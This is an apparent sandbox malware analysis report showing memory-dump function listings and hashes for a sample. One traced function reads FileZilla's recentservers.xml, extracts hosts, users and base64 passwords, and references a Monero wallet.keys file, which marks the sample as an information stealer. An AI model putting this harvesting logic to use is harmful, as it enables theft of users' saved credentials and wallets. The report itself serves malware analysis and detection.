                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b34e25873bf212199ecf3abcf362c90f3566bc6e1fa93ded90464ba3ab583ebe
                                        • Instruction ID: e9f01bcd1397c6eecb97a6b39cc88f8dd24b4682c3ef79f9f0e0564ec84674cd
                                        • Opcode Fuzzy Hash: b34e25873bf212199ecf3abcf362c90f3566bc6e1fa93ded90464ba3ab583ebe
                                        • Instruction Fuzzy Hash: 667139B39093189BE3006E2DDC843BAFBD9EF91721F1A4A3DDAC483B44E97559458683
                                        Function 006AFCEE Relevance: .2, Instructions: 203COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35f0e7901638e70d6f1e2531777482baa7c28ab5a0ff7636d905c7735fbf8e15
                                        • Instruction ID: 1c63ff04c224c1ffe22912856a53738805fa94328e1ee23ebb80df266d034dc1
                                        • Opcode Fuzzy Hash: 35f0e7901638e70d6f1e2531777482baa7c28ab5a0ff7636d905c7735fbf8e15
                                        • Instruction Fuzzy Hash: C55198B351C605EFD2493BA8AC05276B6D7EB86320F35463EE593D6344E9314C039A87
                                        Function 0056FC8A Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d96b1f473cc85eb1fb07381f2239a9ad80ee4d47bd05df3742d79c3ba472127
                                        • Instruction ID: 2801ee8ad1269fd6caa20fb993883b2ea20543913644451578c2b7f35f25e9e8
                                        • Opcode Fuzzy Hash: 9d96b1f473cc85eb1fb07381f2239a9ad80ee4d47bd05df3742d79c3ba472127
                                        • Instruction Fuzzy Hash: 9C41D1F3E182149BF3146A1DEC4576AB7D5EB94720F1B043DDB88D3780E97A681482C6
                                        Function 00532ABF Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37aabefa117d2770b1f156b5286995c1775ab5a4a12b7bc3d938289620e90615
                                        • Instruction ID: ff27664ed85a302f1c75be1a2af213398d28c9c0598b2ca164669c5423250660
                                        • Opcode Fuzzy Hash: 37aabefa117d2770b1f156b5286995c1775ab5a4a12b7bc3d938289620e90615
                                        • Instruction Fuzzy Hash: F84125F3A087108BF348AE29DC8536AF7D6DFE8311F0A853D97C487788E97958018786
                                        Function 0052D78C Relevance: .1, Instructions: 147COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc7a7c0b1a66dbffeab2f5460872f94f0b0300f5eb326d05bd9ab6fd79ef8888
                                        • Instruction ID: ff604ee6c36acd33cc7c8df6cb2748cf02f65e85d74271c5c6ff36ffc8bb25c0
                                        • Opcode Fuzzy Hash: fc7a7c0b1a66dbffeab2f5460872f94f0b0300f5eb326d05bd9ab6fd79ef8888
                                        • Instruction Fuzzy Hash: 34416EF3B0420857F3005D7EEC487B7BB96DBD0320F2A8539D694CB784E879990A4290
                                        Function 0052E0DE Relevance: .1, Instructions: 146COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7822bbe82bf026576dc4b39fbd1d618d32cb9bf7bc3dc08ed67db745b86aa81f
                                        • Instruction ID: 457876a16d693c6535cd6438db12a6a2b8d222384a3cc627c7e08c99e75eb150
                                        • Opcode Fuzzy Hash: 7822bbe82bf026576dc4b39fbd1d618d32cb9bf7bc3dc08ed67db745b86aa81f
                                        • Instruction Fuzzy Hash: E34129F3A082008FE3546E69DC8577AF6E5EBD5310F1A853DD7C8C7784E93888068796
                                        Function 001F6799 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: d21e724791e10dfcd2d1d18d7f1ac9c56c585cc71e50b4cef389cf8b73d0a3db
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: 1D515C62E09BD989C7058B7544502EEBFB25FE6204F1E839EC4981F383C3759689D3E5
                                        Function 001C7588 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                        • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                        Function 00199AA0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        Function 001903B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,001A0DBF,001A0DBE,001A0DBB,001A0DBA), ref: 001904C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001904C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 001904E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 001904F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0019052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 0019053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00190579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 00190587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001905C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 001905D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 00190662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 0019067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 00190692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 001906AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001906C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 001906D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 001906E0
                                        • lstrcat.KERNEL32(?,00000000), ref: 001906F3
                                        • lstrcat.KERNEL32(?,001A1770), ref: 00190702
                                        • lstrcat.KERNEL32(?,00000000), ref: 00190715
                                        • lstrcat.KERNEL32(?,001A1774), ref: 00190724
                                        • lstrcat.KERNEL32(?,login: ), ref: 00190733
                                        • lstrcat.KERNEL32(?,00000000), ref: 00190746
                                        • lstrcat.KERNEL32(?,001A1780), ref: 00190755
                                        • lstrcat.KERNEL32(?,password: ), ref: 00190764
                                        • lstrcat.KERNEL32(?,00000000), ref: 00190777
                                        • lstrcat.KERNEL32(?,001A1790), ref: 00190786
                                        • lstrcat.KERNEL32(?,001A1794), ref: 00190795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 001907EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: c093cc12e892e8d95863b230683e19c05f2b78dd10b6cf16f45e97f8756db73c
                                        • Instruction ID: be1cac88576c0ff9c0f4e1f9b53fce910651355a40a6b9b06d70074ddf1098ab
                                        • Opcode Fuzzy Hash: c093cc12e892e8d95863b230683e19c05f2b78dd10b6cf16f45e97f8756db73c
                                        • Instruction Fuzzy Hash: 4FD13076910208ABCF04EBF0DD56EEE7779AF29301F508564F102A7196DF34BA48CBA5
                                        Function 001859B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
